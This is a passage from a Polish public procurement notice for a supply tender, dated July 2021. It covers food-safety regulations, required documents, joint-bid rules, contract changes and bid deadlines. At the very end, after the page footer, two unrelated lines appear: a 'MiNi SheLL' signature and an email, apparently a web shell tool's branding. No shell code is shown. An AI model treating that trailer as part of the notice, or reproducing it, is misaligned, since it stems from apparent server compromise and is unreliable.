z dnia 25 października<br/>2011r w sprawie przekazywania konsumentom informacji na temat żywności*<br/>• Rozporządzenie Ministra Zdrowia z dnia 22 listopada 2010r. w sprawie dozwolonych substancji<br/>dodatkowych*<br/>• Rozporządzenie Komisji (WE) nr 2073/2005 z dnia 15 listopada 2005r w sprawie kryteriów<br/>mikrobiologicznych dotyczących środków spożywczych*<br/>• Rozporządzenie Komisji (WE) 1881/2006 z dnia 19 grudnia 2006r ustalające najwyższe<br/>dopuszczalne poziomy niektórych zanieczyszczeń w środkach spożywczych*<br/>• Rozporządzenie Parlamentu Europejskiego i Rady (WE) nr 1333/2008 z dnia 16 grudnia<br/>2008r. w sprawie dodatków do żywności*<br/>• Przepisów dot. Substancji i preparatów chemicznych**<br/>• Przepisami dot. produktów biobójczych**<br/>• Przepisami z obszaru BHP dot. Stosowania substancji i preparatów chemicznych**<br/>• Przepisów dot. Materiałów i wyrobów przeznaczonych do kontaktu z żywnością.**<br/>*oznacza aktualne wydanie normy lub przepisu prawnego<br/>** oznacza aktualne przepisy prawne<br/>(treść oświadczenia zawarta w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ) <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4. Pozostałe dokumenty wymagane wraz z ofertą<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania osoby<br/>działającej w imieniu odpowiednio: wykonawcy lub wykonawców wspólnie ubiegających się o udzielenie zamówienia – chyba że umocowanie do reprezentowania określonego podmiotu<br/>wynika z informacji ujawnionych w Krajowym Rejestrze Sądowym, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innym właściwym rejestrze<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej opatrzone kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym lub w przypadku dokumentu w<br/>postaci papierowej - w postaci cyfrowego odwzorowania dokumentu opatrzonego<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym<br/>przez mocodawcę lub notariusza<br/>W zakresie nieuregulowanym SWZ, zastosowanie mają przepisy Rozporządzenia Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 roku w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy (Dz.U. 2020 poz. 2415) oraz Rozporządzenie Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (D.Z. z 2020 poz. 2452) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania, jakie musi spełniać oferta składana przez dwa lub więcej podmiotów<br/>(Wykonawców ubiegających się wspólnie o udzielenie zamówienia np. konsorcja, spółki<br/>cywilne):1) Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia2) Wykonawcy występujący<br/>wspólnie zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego; 3) Wszelka korespondencja oraz rozliczenia<br/>dokonywane będą wyłącznie z podmiotem występującym jako reprezentant pozostałyc <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy,<br/>stanowiącym Załącznik nr 3 do SWZ.Zmiana umowy wymaga dla swej ważności, pod rygorem<br/>nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-28 09:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma eZamawiajacy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-19 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com